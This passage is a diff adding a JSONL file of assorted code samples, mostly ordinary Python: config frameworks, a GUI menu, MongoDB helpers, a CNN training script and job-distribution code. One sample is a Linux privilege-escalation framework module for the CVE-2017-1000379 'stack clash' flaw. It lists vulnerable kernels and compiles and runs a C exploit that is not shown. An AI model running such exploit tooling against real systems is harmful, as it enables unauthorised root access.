diff --git "a/4899.jsonl" "b/4899.jsonl" new file mode 100644--- /dev/null +++ "b/4899.jsonl" @@ -0,0 +1,665 @@ +{"seq_id":"22017132","text":"from functools import update_wrapper\nimport logging\nimport sys\nfrom .config import Configurable, Directive, commit, create_code_info\nfrom .compat import with_metaclass\n\n\nclass Config(object):\n \"\"\"The object that contains the configurations.\n\n The configurations are specified by the :attr:`Action.config`\n class attribute of :class:`Action`.\n \"\"\"\n pass\n\n\nclass AppMeta(type):\n \"\"\"Dectate metaclass.\n\n Sets up ``config`` and ``dectate`` class attributes.\n\n Keeps track of all :class:`App` subclasses.\n \"\"\"\n def __new__(cls, name, bases, d):\n extends = [base.dectate for base in bases\n if hasattr(base, 'dectate')]\n d['config'] = config = Config()\n d['dectate'] = configurable = Configurable(extends, config)\n result = super(AppMeta, cls).__new__(cls, name, bases, d)\n configurable.app_class = result\n return result\n\n\nclass App(with_metaclass(AppMeta)):\n \"\"\"A configurable application object.\n\n Subclass this in your framework and add directives using\n the :meth:`App.directive` decorator.\n\n Set the ``logger_name`` class attribute to the logging prefix\n that Dectate should log to. By default it is ``\"dectate.directive\"``.\n \"\"\"\n logger_name = 'dectate.directive'\n \"\"\"The prefix to use for directive debug logging.\"\"\"\n\n dectate = None\n \"\"\"A dectate Configurable instance is installed here.\n\n This is installed when the class object is initialized, so during\n import-time when you use the ``class`` statement and subclass\n :class:`dectate.App`.\n\n This keeps tracks of the registrations done by using directives as long\n as committed configurations.\n \"\"\"\n\n config = None\n \"\"\"Config object that contains the configuration after commit.\n\n This is installed when the class object is initialized, so during\n import-time when you use the ``class`` statement and subclass\n :class:`dectate.App`, but is only filled after you commit the\n configuration.\n\n This keeps the final configuration result after commit. It is\n a very dumb object that has no methods and is just a container for\n attributes that contain the real configuration.\n \"\"\"\n\n @classmethod\n def directive(cls, name):\n \"\"\"Decorator to register a new directive with this application class.\n\n You use this as a class decorator for a\n :class:`dectate.Action` or a :class:`dectate.Composite`\n subclass::\n\n @MyApp.directive('my_directive')\n class FooAction(dectate.Action):\n ...\n\n This needs to be executed *before* the directive is used and\n thus might introduce import dependency issues unlike normal\n Dectate configuration, so beware! An easy way to make sure\n that all directives are installed before you use them is to\n make sure you define them in the same module as where you\n define the :class:`App` subclass that has them.\n\n :param name: the name of the directive to register.\n :return: a directive that when called installs the directive\n method on the class.\n \"\"\"\n return DirectiveDirective(cls, name)\n\n @classmethod\n def private_action_class(cls, action_class):\n \"\"\"Register a private action class.\n\n In some cases action classes can be an implementation detail,\n for instance in the implementation of a Composite action.\n\n In this case you don't want the action class to be known\n but not have a directive.\n\n This function may be used as a decorator like this::\n\n @App.private_action_class\n class MyActionClass(dectate.Action):\n ...\n\n :param action_class: the :class:`dectate.Action` subclass to register.\n :return: the :class`dectate.Action` class that was registered.\n \"\"\"\n cls.dectate.register_action_class(action_class)\n return action_class\n\n @classmethod\n def commit(cls):\n \"\"\"Commit this class and any depending on it.\n\n This is intended to be overridden by subclasses if committing\n the class also commits other classes automatically, such as in\n the case in Morepath when one app is mounted into another. In\n such case it should return an iterable of all committed\n classes.\n\n :return: an iterable of committed classes\n \"\"\"\n commit(cls)\n return [cls]\n\n @classmethod\n def is_committed(cls):\n \"\"\"True if this app class was ever committed.\n\n :return: bool that is ``True`` when the app was committed before.\n \"\"\"\n return cls.dectate.committed\n\n\nclass DirectiveDirective(object):\n \"\"\"Implementation of the ``directive`` directive.\n\n :param cls: the class that this directive is registered on.\n :param name: the name of the directive.\n \"\"\"\n def __init__(self, cls, name):\n self.cls = cls\n self.name = name\n\n def __call__(self, action_factory):\n \"\"\"Register the directive with app class.\n\n Creates a class method on the app class for the directive.\n\n :param action_factory: the :class:`dectate.Action` or\n :class:`dectate.Composite` subclass to register.\n :return: the action or composite subclass that was registered.\n \"\"\"\n directive_name = self.name\n\n def method(cls, *args, **kw):\n frame = sys._getframe(1)\n code_info = create_code_info(frame)\n logger = logging.getLogger('%s.%s' %\n (cls.logger_name, directive_name))\n return Directive(cls, action_factory, args, kw,\n code_info, directive_name, logger)\n method.action_factory = action_factory # to help sphinxext\n setattr(self.cls, self.name, classmethod(method))\n method.__name__ = self.name\n method.__doc__ = action_factory.__doc__\n method.__module__ = action_factory.__module__\n self.cls.dectate.register_action_class(action_factory)\n return action_factory\n","sub_path":"dectate/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"340304749","text":"import webbrowser\nimport tkinter as tk\nfrom system.gui.widgets.factory import create_widget\nfrom system.params import VERSION, COPYRIGHT\n\n\nclass HelpMenu:\n\n def __init__(self, master_menu):\n\n self.menu = tk.Menu(master=master_menu, tearoff=0)\n master_menu.add_cascade(label='Help', menu=self.menu)\n self.menu.add_command(label='Version')\n self.menu.add_command(label='Documentation')\n self.menu.add_command(label='Github')\n self.menu.add_command(label='Contact')\n self.menu.entryconfig(0, command=self.show_version)\n self.menu.entryconfig(1, command=self.show_docs)\n self.menu.entryconfig(2, command=self.show_github)\n self.menu.entryconfig(3, command=self.show_contact)\n\n def show_version(self):\n\n window = create_widget('toplevel', master=self.menu, title='Version')\n create_widget('logo', master=window, row=0, column=0)\n create_widget('label', master=window, row=1, column=0, text=f'Version {VERSION}', sticky=None)\n create_widget('label', master=window, row=2, column=0, text=COPYRIGHT, sticky=None)\n\n def show_docs(self):\n\n webbrowser.open('https://autooed.readthedocs.io')\n\n def show_github(self):\n\n webbrowser.open('https://github.com/yunshengtian/AutoOED')\n\n def show_contact(self):\n\n webbrowser.open('mailto:autooed@csail.mit.edu')\n","sub_path":"system/gui/modules/help_menu.py","file_name":"help_menu.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"265204942","text":"import FWCore.ParameterSet.Config as cms\n\nphotonMaker = cms.EDProducer(\"PhotonMaker\",\n\taliasPrefix = cms.untracked.string(\"photons\"),\n minEt = cms.double(10.), #gev, min to keep\n # Photon collection\n photonsInputTag = cms.InputTag(\"photons\"),\n ecalRecHitsInputTag_EE = cms.InputTag(\"ecalRecHit\",\"EcalRecHitsEE\"),\n ecalRecHitsInputTag_EB = cms.InputTag(\"ecalRecHit\",\"EcalRecHitsEB\"),\n cms2scsseeddetidInputTag = cms.InputTag(\"scMaker\"),\n)\n\n","sub_path":"NtupleMaker/python/photonMaker_cfi.py","file_name":"photonMaker_cfi.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"14520428","text":"from django.conf import settings\nimport pymongo\nimport logging\nlogger = logging.getLogger('giviu')\n\n\ndef connect():\n try:\n mongo = pymongo.MongoClient(settings.SOCIAL['MONGO_HOST'])\n except pymongo.errors.ConnectionFailure:\n logger.critical('Unable to connect to social mongo on ' +\n settings.SOCIAL['MONGO_HOST'])\n return None\n return mongo.eve\n\n\ndef add_external_codes_for_giftcard(giftcard, external_codes):\n client = connect()\n if not client:\n return None\n\n ecs = []\n for ec in external_codes:\n ecs.append({'status': 'available',\n 'giftcard_id': giftcard,\n 'code': ec})\n client.external_codes.insert(ecs)\n\n\ndef get_external_codes_for_giftcard(giftcard):\n client = connect()\n if not client:\n return None\n\n ecode = client.external_codes.find_one({'giftcard_id': giftcard.id,\n 'status': 'available'})\n if not ecode:\n logger.warning('No external codes for giftcard id: ' + giftcard.id)\n return None\n\n client.external_codes.update({'_id': ecode['_id']},\n {'$set': {'status': 'used'}})\n return ecode['code']\n","sub_path":"giviu/external_codes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"253724016","text":"a = input(\"α=\")\r\nb = input(\"β=\")\r\nc = input(\"γ=\")\r\nprint (\"Θα λύσουμε την εξίσωση: \")\r\nprint (\"{}x**2 + {}x + {} = 0\\n\".format(a,b,c))\r\na = float(a)\r\nb = float(b)\r\nc = float(c)\r\n\r\nif a == 0 :\r\n if b == 0 :\r\n if c == 0 :\r\n print(\"Υπάρχουν άπειρες λύσεις\")\r\n else :\r\n print(\"Δεν υπάρχουν λύσεις\")\r\n else :\r\n print (\"Οι λύσεις είναι χ1 = χ2 = {:1.2f}\".format( - c/b ))\r\nelse :\r\n diak = b**2 - 4 * a * c\r\n print(\"H διακρίνουσα είναι {:1.2f}\".format(diak))\r\n\r\n if diak < 0 :\r\n print(\"Η εξίσωση δεν έχει πραγματικές λύσεις\")\r\n else :\r\n x1 = (-b + diak**0.5)/(2*a)\r\n x2 = (-b - diak**0.5)/(2*a)\r\n print(\"Οι λύσεις είναι: χ1 = {:1.2f}, χ2 = {:1.2f}\".format(x1,x2))\r\n","sub_path":"Python/Introduction to Python-Mathesis Course/Week 2/v7.2.py","file_name":"v7.2.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"525937223","text":"import pddlpy\nimport sys\nimport copy\nfrom plan_executor import Executor\nfrom Search import *\n\n\nALPHA = 1.0\n\nclass Problem:\n\n def __init__(self, robot_domain_model, robot_problem, plan_file, explanatory_actions_file, max_expl_length):\n\n exc = Executor(robot_domain_model, robot_problem, plan_file)\n self.orig_beh_trace = copy.deepcopy(exc.get_beh_trace())\n self.max_expl_length = max_expl_length\n \n with open(explanatory_actions_file) as e_fd:\n self.action_set = set([a.strip() for a in e_fd.readlines()])\n\n\n def explain(self):\n start_state = SearchNode(set(), self.action_set, [], self.orig_beh_trace, ALPHA)\n\n final_explanation = Exhaustive_Search(start_state, self.max_expl_length)\n\n return final_explanation.prefix\n\n\n\n","sub_path":"CRF_Implementation/Explanation_Generator/src/Problem.py","file_name":"Problem.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"645181015","text":"\"\"\"\nhttps://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt\n\"\"\"\nimport os\nfrom exploits.exploit import LinuxExploit\nfrom src.kernels import KernelWindow\nfrom constants import color_print, UBUNTU_17, UBUNTU_16, UBUNTU_14, DEBIAN_9, DEBIAN_8, DEBIAN_7, FEDORA, CENTOS, \\\n\tCONFIRMED_VULNERABLE, HIGH_RELIABILITY, ARCHITECTURE_amd64, PLAYGROUND_PATH, LINUX_EXPLOIT_SOURCE_PATH\n\nclass CVE20171000379(LinuxExploit):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.name = \"CVE20171000379\"\n\t\tself.formatted_name = \"CVE-2017-1000379\"\n\t\tself.type = \"linux\"\n\t\tself.brief_desc = \"Stack clash vulnerability from qualys \"\n\t\tself.reliability = HIGH_RELIABILITY\n\t\tself.vulnerable_kernels = [\n\t\t\tKernelWindow(UBUNTU_17, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5),\n\t\t\tKernelWindow(UBUNTU_16, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5),\n\t\t\tKernelWindow(UBUNTU_14, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5),\n\t\t\tKernelWindow(DEBIAN_9, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5),\n\t\t\tKernelWindow(DEBIAN_8, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5),\n\t\t\tKernelWindow(DEBIAN_7, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5),\n\t\t\tKernelWindow(FEDORA, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5),\n\t\t\tKernelWindow(CENTOS, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5)\n\t\t]\n\t\tself.architecture = ARCHITECTURE_amd64\n\t\tself.source_c_path = os.path.join(LINUX_EXPLOIT_SOURCE_PATH, \"{}.c\".format(self.name))\n\t\tself.compilation_path = os.path.join(PLAYGROUND_PATH, self.name)\n\t\tself.compilation_command = \"gcc -o {} {}\".format(self.compilation_path, self.source_c_path)\n\t\tself.exploit_command = self.compilation_path\n\n\tdef determine_vulnerability(self):\n\t\tcolor_print(\"\\t[*] checking exploitation prerequisites for {}\".format(self.name), color=\"blue\")\n\t\t# if kernel matches...it should be vulnerable\n\t\tcolor_print(\"\\t[+] system appears to be vulnerable to {}\".format(self.name), color=\"green\")\n\t\treturn True\n\n\tdef exploit(self):\n\t\tself.exploit_failure(\"this requires manual exploitation. review source at {}\".format(self.source_c_path))\n","sub_path":"exploits/linux/CVE20171000379.py","file_name":"CVE20171000379.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"153692578","text":"# -*- coding: utf-8 -*-\nimport urllib\nimport send_text\ndef read_text():\n\tquotes = open(\"/home/rafaqtro/udacity/Programming Foundations with Python /proyecto final/Profanity Editor/texto.txt\",\"r\")\n\tcontents_of_file = quotes.readlines()\n\tquotes.close()\n\tchequear_groserias(contents_of_file)\n\n\ndef chequear_groserias(texto_a_chequear):\n\tgroserias = [\"marico\", \"puta\", \"coño\", \"cabron\", \"hijoputa\", \"coño de tu madre\",\"pendejo\", \"Coño\", \"maldito\",\"maldita\"]\n\tfor x in texto_a_chequear:\n\t\tfor i in groserias:\n\t\t\tif i in x:\t\n\t\t\t\tsend_text.send_sms() \n\t\t\t\tbreak\nread_text()\n\n","sub_path":"Profanity Editor/check_profanity.py","file_name":"check_profanity.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"81693297","text":"import json\nimport httplib\nfrom os import path\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect, get_object_or_404\nfrom django.forms.models import model_to_dict\nfrom django.views.decorators.http import require_GET\nfrom datetime import datetime\nfrom hashtags_battle.models import Battle\n\nNO_RESULT_MESSAGE = 'No results yet'\n\n\n@require_GET\ndef battles(request):\n \"\"\"\n Returns all battles\n @param request:\n @return:\n \"\"\"\n data = [{'id': b.id, 'url': request.build_absolute_uri(path.join(request.get_full_path(), str(b.id)))} for b in\n Battle.objects.all()]\n response = {'url': request.build_absolute_uri(),\n 'count': len(data),\n 'data': data,\n 'status': httplib.OK}\n return HttpResponse(json.dumps(response))\n\n\n@require_GET\ndef battle_by_id(request, battle_id):\n \"\"\"\n Returns single battle resource\n @param request:\n @param battle_id: id of the battle\n @return: HttpResponse\n \"\"\"\n battle = get_object_or_404(Battle, id=battle_id)\n data = model_to_dict(battle)\n hashtags = []\n for hashtag in battle.hashtags.all():\n battle_dict = model_to_dict(hashtag)\n try:\n result = hashtag.result_set.filter(battle=battle).all()[0].typos\n except IndexError:\n result = NO_RESULT_MESSAGE\n battle_dict['typos'] = result\n hashtags.append(battle_dict)\n data['hashtags'] = hashtags\n data['winner'] = battle.winner\n response = {'url': request.build_absolute_uri(),\n 'data': data,\n 'status': httplib.OK}\n\n def date_handler(obj):\n \"\"\"\n Handles datetime objects, which json dumper do not know how to deal with\n @param obj:\n @return:\n \"\"\"\n return obj.isoformat() if isinstance(obj, datetime) else obj\n\n return HttpResponse(json.dumps(response, default=date_handler))\n\n\n@require_GET\ndef index(request):\n \"\"\"\n Index just redirects to battles, as there is nothing else available here for now...\n @param request:\n @return:\n \"\"\"\n return redirect(battles)\n","sub_path":"hashtags_battle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"119760457","text":"import services.pipelines.Task as task\n\nclass TestTask(task.Task):\n def exec(self, task_input, task_output):\n sinus_rythm_count = self.instances(task_input[\"fantasia_test_loc\"]) + self.instances(task_input[\"nsr_test_loc\"])\n\n af_rythm_count = self.instances(task_input[\"ltaf_test_loc\"])\n\n ratio = af_rythm_count // sinus_rythm_count\n\n with open(task_input[\"test_loc\"], 'w') as training_file:\n training_labels = open(task_input[\"labels_test_loc\"], 'w')\n training_labels.write(\"sinus,af\\n\")\n\n nsr = open(task_input[\"nsr_test_loc\"])\n fantasia = open(task_input[\"fantasia_test_loc\"])\n ltaf =open(task_input[\"ltaf_test_loc\"]) \n\n training_file.write(ltaf.readline())\n \n nsr.readline()\n fantasia.readline()\n\n nsr_read = nsr.readline()\n fantasia_read = fantasia.readline()\n ltaf_read = ltaf.readline()\n\n while nsr_read != \"\" and ltaf_read != \"\" and fantasia_read != \"\":\n index_counter = 0\n\n while index_counter < 2000 and fantasia_read != \"\":\n training_file.write(fantasia_read)\n training_labels.write(\"1,0\\n\")\n\n fantasia_read = fantasia.readline()\n\n index_counter += 1\n\n index_ltaf = 0\n\n while index_ltaf < index_counter and ltaf_read != \"\":\n training_file.write(ltaf_read)\n training_labels.write(\"0,1\\n\")\n\n for _ in range(0, (ratio - 1)):\n ltaf.readline()\n\n ltaf_read = ltaf.readline()\n index_ltaf += 1\n \n index_nsr = 0\n\n while index_nsr < index_ltaf and nsr_read != \"\":\n training_file.write(nsr_read)\n training_labels.write(\"1,0\\n\")\n\n nsr_read = nsr.readline()\n\n index_nsr += 1\n \n index_ltaf = 0\n\n while index_ltaf < index_counter and ltaf_read != \"\":\n training_file.write(ltaf_read)\n training_labels.write(\"0,1\\n\")\n\n for _ in range(0, (ratio - 1)):\n ltaf.readline()\n\n ltaf_read = ltaf.readline()\n index_ltaf += 1\n \n while ltaf_read != \"\" and nsr_read != \"\":\n index_nsr = 0\n\n while index_nsr < 2000 and nsr_read != \"\":\n training_file.write(nsr_read)\n training_labels.write(\"1,0\\n\")\n\n nsr_read = nsr.readline()\n\n index_nsr += 1\n \n index_ltaf = 0\n\n while index_ltaf < index_nsr and ltaf_read != \"\":\n training_file.write(ltaf_read)\n training_labels.write(\"0,1\\n\")\n\n for _ in range(0, (ratio - 1)):\n ltaf.readline()\n\n ltaf_read = ltaf.readline()\n index_ltaf += 1\n\n nsr.close()\n fantasia.close()\n ltaf.close()\n training_labels.close()\n\n def reverse(self, task_input, task_output):\n pass\n\n def instances(self, path):\n count = 0\n\n with open(path) as data_file:\n data_set = data_file.readline()\n\n while data_set != \"\":\n count += 1\n\n data_set = data_file.readline()\n \n return count","sub_path":"Physionet/ML_sets/tasks/TestTask.py","file_name":"TestTask.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"605315798","text":"#ROS and OpenCV don't play nice in python3\nimport sys\nif '/opt/ros/kinetic/lib/python2.7/dist-packages' in sys.path:\n sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')\n\n# import the neccessary packages\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\n\nfrom preprocessing.imagetoarraypreprocessor import ImageToArrayPreprocessor\nfrom preprocessing.aspectawarepreprocessor import AspectAwarePreprocessor\nfrom datasets.simpleDatasetLoader import SimpleDatasetLoader\nfrom nn.conv.minivggnet import MiniVGGNet\n\nfrom tensorflow.keras.optimizers import SGD\nfrom imutils import paths\nimport matplotlib.pyplot as plt\nimport numpy as np \nimport argparse\nimport os\nimport cv2\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-d\",\"--dataset\",required=True,help=\"path to input dataset\")\nargs= vars(ap.parse_args())\n\n# grab the lst of images that we'll be describing, then extract \n# the class label names from the image paths\n\nprint(\"[INFO] loading images...\")\nimagePaths=sorted(list(paths.list_images(args['dataset'])))\n\n#this is incredibly inefficient but oooooookkkk\nclassNames=np.unique([pt.split(os.path.sep)[-2] for pt in imagePaths])\n\n#initialize the image preprocessors\naap = AspectAwarePreprocessor(64,64)\niap = ImageToArrayPreprocessor()\n\n# load the dataset from disk and then scale the raw pixel intensities\n# to the range [0,1]\nsdl = SimpleDatasetLoader(preprocessors=[aap,iap])\n(data,labels) = sdl.load(imagePaths,verbose=50)\ndata=data.astype(\"float\") / 255.0\n\n# partition the data into training and testing splits using 75% of \n# the data for training and the remaining 25% for testing\n\n(trainX,testX,trainY,testY) = train_test_split(data,labels, test_size=0.25, random_state=42)\n\n# convert the labels from integers to vectors\n\ntrainY = LabelBinarizer().fit_transform(trainY)\ntestY = LabelBinarizer().fit_transform(testY)\n\n#Initialize the optimizer and model\nprint(\"[INFO] compiling model...\")\nopt = SGD(lr=0.05)\n\nmodel = MiniVGGNet.build(width=64,height=64,depth=3,classes=len(classNames))\nmodel.compile(loss=\"categorical_crossentropy\",optimizer=opt,metrics=['accuracy'])\nprint(model.summary())\n\n# Train the network\nprint(\"[INFO] training the network...\")\n\n#define how many epochs you want (I swear Imma make this a parameter)\nnum_epochs=100\nH= model.fit(trainX,trainY,validation_data=(testX,testY),batch_size=32,epochs=num_epochs,verbose=1)\n\n\n# evaluate the network\nprint(\"[INFO] evaluating network...\")\npredictions = model.predict(testX,batch_size=32)\nprint(classification_report(testY.argmax(axis=1),predictions.argmax(axis=1),target_names=classNames))\n# plot the training loss and accuracy\nplt.style.use(\"ggplot\")\nplt.figure()\nfor key in H.history.keys():\n plt.plot(np.arange(0,num_epochs),H.history[key],label=key)\n\nplt.title(\"Training Loss and Accuracy\")\nplt.xlabel(\"Epoch #\")\nplt.ylabel(\"Loss/Accuracy\")\nplt.legend()\nplt.show()","sub_path":"Practioner_bundle/minivggnet_flowers17.py","file_name":"minivggnet_flowers17.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"460414626","text":"import matplotlib; matplotlib.use('Agg') # Force matplotlib to not use any Xwindows backend; instead, writes files\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport csv\r\n\r\ndef distribute_jobs(n , k, dist_type='regular-soliton', params=[]):# machines_jobs_list = [[0, 1, 2], [1, 2], [2]]\r\n\t# machines_jobs_list = [[0, 1] ,[1]] # k2 n2\r\n\t# machines_jobs_list = [[0, 1,2] ,[1,2], [0], [2]] # k3 n4\r\n\t# machines_jobs_list = [[0, 1,2] ,[1,2], [0], [2,4], [3], [0,1], [4,5]] # k6 n7\r\n\t# return machines_jobs_list\r\n\t# import random; seed0 = random.randint(0,10000)\r\n\t# seed0 = 3635\r\n\t# print \"np seed\", seed0\r\n\t# np.random.seed(seed0)\r\n\t#---------------------\r\n\r\n\t# Nathan's distribtuion part\r\n\r\n\tif 'soliton' in dist_type:\r\n\t\t# Default\r\n\t\tif params == []: params = [8, 0.05]\r\n\t\tL, sing_frac = params[0], params[1]\r\n\r\n\t\t# Making soliton right degrees\r\n\t\tL_soliton = [0]*(L+1) # Pseudo 1-indexed\r\n\t\tfor i in range(2, L+1):\r\n\t\t\tL_soliton[i] = 1/float((i * (i-1)))\r\n\r\n\t\t# Adding some percentage of singletons, normalizing\r\n\t\tL_soliton = [(1-sing_frac)*a/sum(L_soliton) for a in L_soliton]\r\n\t\tL_soliton[1] = sing_frac\r\n\r\n\t\tnum_machines = [round(n*l) for l in L_soliton]\r\n\t\tnum_machines[1] += n - sum(num_machines)\r\n\r\n\t\tmachines = []\r\n\t\tfor d in range(len(num_machines)):\r\n\t\t\tmachines.extend([d for _ in range(int(num_machines[d]))])\r\n\r\n\r\n\t\tif dist_type == 'regular-soliton':\r\n\t\t\t# Making regular left degrees\r\n\t\t\tright_total = sum(machines)\r\n\t\t\tave_degree = np.floor(right_total / k)\r\n\t\t\tremainder = right_total - ave_degree*k\r\n\t\t\t\r\n\t\t\tjob_degrees = [ave_degree for _ in range(k)]\r\n\t\t\tfor i in range(int(remainder)): job_degrees[i] += 1\r\n\t\telif dist_type == 'irregular-soliton':\r\n\t\t\tjobs = range(k)\r\n\t\t\tfor machine in machines:\r\n\t\t\t\tm_jobs = list(np.random.choice(jobs, size=machine, replace=False))\r\n\t\t\t\tmachines_jobs_list.append(m_jobs)\r\n\t\t\treturn machines_jobs_list\r\n\r\n\r\n\telif dist_type == 'regular-regular':\r\n\t\tif params == []: params = [3, 0.05]\r\n\t\tright_degree, sing_frac = params[0], params[1]\r\n\r\n\t\tmachines = [1 for _ in range(int(sing_frac*n))]\r\n\t\trest = n - int(sing_frac*n)\r\n\t\tmachines.extend([right_degree for _ in range(rest)])\r\n\r\n\t\t# Making regular left degrees\r\n\t\tright_total = sum(machines)\r\n\t\tave_degree = np.floor(right_total / k)\r\n\t\tremainder = right_total - ave_degree*k\r\n\t\t\r\n\t\tjob_degrees = [ave_degree for _ in range(k)]\r\n\t\tfor i in range(int(remainder)): job_degrees[i] += 1\r\n\r\n\t# Distributing\r\n\tall_jobs = []\r\n\tfor i in range(len(job_degrees)):\r\n\t\tlst = [i for _ in range(int(job_degrees[i]))]\r\n\t\tall_jobs.extend(lst)\r\n\tnp.random.shuffle(all_jobs)\r\n\r\n\t# Don't give machine same job twice\r\n\tsucceeded = False\r\n\twhile not succeeded:\r\n\t\tnp.random.shuffle(all_jobs)\r\n\t\tmachines_jobs_list = []\r\n\t\tfor machine in machines[::-1]:\r\n\t\t\tm_jobs, i, rem = [], 0, machine\r\n\t\t\twhile rem > 0:\r\n\t\t\t\tif i >= len(all_jobs):\r\n\t\t\t\t\trem = -1\r\n\t\t\t\telif all_jobs[i] not in m_jobs:\r\n\t\t\t\t\tm_jobs.append(all_jobs.pop(i))\r\n\t\t\t\t\trem -= 1\r\n\t\t\t\telse:\r\n\t\t\t\t\ti += 1\r\n\t\t\tmachines_jobs_list.append(m_jobs)\r\n\t\tif len(machines_jobs_list) == len(machines):\r\n\t\t\tsucceeded = True\r\n\t# print machines_jobs_list\r\n\treturn machines_jobs_list\r\n\r\ndef peel_T(machines_jobs_list, arrival_time, n, k, error_floor, get_decode_seq = False):\r\n\r\n\tjob_success = [False for _ in range(k)]\r\n\r\n\tdec_seq = np.identity(n , dtype = int) \r\n\tdec_ans = [(-1) for _ in range(k)] # decode answer machine number\r\n\r\n\r\n\tarrive_order = sorted(range(len(arrival_time)), key=lambda k: arrival_time[k]) # gets the index of sorted arrival_time list\r\n\r\n\tcurrent_machines_jobs_list = [[] for _ in range(n)]\r\n\t\r\n\t# peeling process\r\n\t\r\n\t# print \"arrive order\", arrive_order\r\n\r\n\r\n\tsuc_T = -1.0 # returns -1 if failed to succeed\r\n\r\n\tfor t_i in range(n):\r\n\t\tarrived_machine = arrive_order[t_i]\r\n\t\tcurrent_machines_jobs_list[arrived_machine] = machines_jobs_list [arrived_machine]\r\n\t\t# print current_machines_jobs_list\r\n\t\t\r\n\r\n\t\t#try peeling\r\n\t\t# check singletons\r\n\t\tsingleton_exist = True\r\n\t\twhile singleton_exist:\r\n\t\t\tsingleton_exist = False\r\n\t\t\r\n\t\t\t# remove already known job edge from other machines\r\n\t\t\tfor m_i2 in range(len(current_machines_jobs_list)):\r\n\t\t\t\tfor job_i in current_machines_jobs_list[m_i2]:\r\n\t\t\t\t\tif job_success[job_i]:\r\n\t\t\t\t\t\tcurrent_machines_jobs_list[m_i2].remove(job_i) #peeling\r\n\t\t\t\t\t\tif get_decode_seq:\r\n\t\t\t\t\t\t# calculate decoding sequence \r\n\t\t\t\t\t\t\tdec_seq[m_i2] -= dec_seq[dec_ans[job_i]]\r\n\t\t\r\n\t\t\t# check singleton\r\n\t\t\tfor m_i in range(len(current_machines_jobs_list)): \r\n\t\t\t\tif (len(current_machines_jobs_list[m_i]) == 1):\r\n\t\t\t\t\tsingleton_exist = True\r\n\t\t\t\t\tjob_singleton = current_machines_jobs_list[m_i].pop()\r\n\t\t\t\t\tjob_success[job_singleton] = True\r\n\t\t\t\t\tif get_decode_seq:\r\n\t\t\t\t\t\tdec_ans[job_singleton] = m_i\r\n\r\n\r\n\t\t# print \"check singleton\", [job_i for job_i in range(len(job_success)) if job_success[job_i]==True] \r\n\t\t# print \"\"\r\n\r\n\t\tif sum(job_success) > (1- error_floor)*len(job_success):\r\n\t\t\tsuc_T = arrival_time[t_i]\r\n\t\t\tbreak\r\n\r\n\treturn suc_T, dec_seq, dec_ans\r\n\r\n\r\n\r\ndef save_machines_jobs_list(machines_jobs_list):\r\n\t# save machines_jobs_list as csv column list of (job_number, machine_number, local_master_rank)\r\n\tcsv_file = open(\"machines_jobs_list.csv\", \"w\")\r\n\tcw = csv.writer(csv_file , delimiter=',', quotechar='|')\r\n\r\n\tlocal_master_rank = 0\r\n\tfor i1 in range(len(machines_jobs_list)):\r\n\t\tfor i2 in range(len(machines_jobs_list[i1])):\r\n\t\t\tjob_number = machines_jobs_list[i1][i2]\r\n\t\t\tmachine_number = i1\r\n\t\t\tcw.writerow([str(job_number), str(machine_number), str(local_master_rank)])\r\n\t\tlocal_master_rank += len(machines_jobs_list[i1])\r\n\r\n\tcsv_file.close()\r\n\r\n\r\ndef read_machines_jobs_list(n, k):\r\n\t# read machines_jobs_list from csv column list of (job_number, machine_number, local_master_rank)\r\n\t# use rank = -1 to avoid providing local machine info\r\n\t\r\n\tmachines_jobs_list = [[] for i in range(n)]\r\n\tlocal_master_list = [-1 for i in range(n)] # indcates local master's rank\r\n\r\n\tcsv_file = open(\"machines_jobs_list.csv\", \"r\")\r\n\tcr = csv.reader(csv_file)\r\n\r\n\tfor row in cr:\r\n\t\tjob_number = int(row[0])\r\n\t\tmachine_number = int(row[1])\r\n\t\tlocal_master_rank = int(row[2])\r\n\t\tmachines_jobs_list[machine_number].append(job_number)\r\n\t\tif local_master_list[machine_number] == -1:\r\n\t\t\tlocal_master_list[machine_number] = local_master_rank\r\n\tcsv_file.close()\r\n\r\n\tmaster_info = (machines_jobs_list, local_master_list)\r\n\r\n\treturn 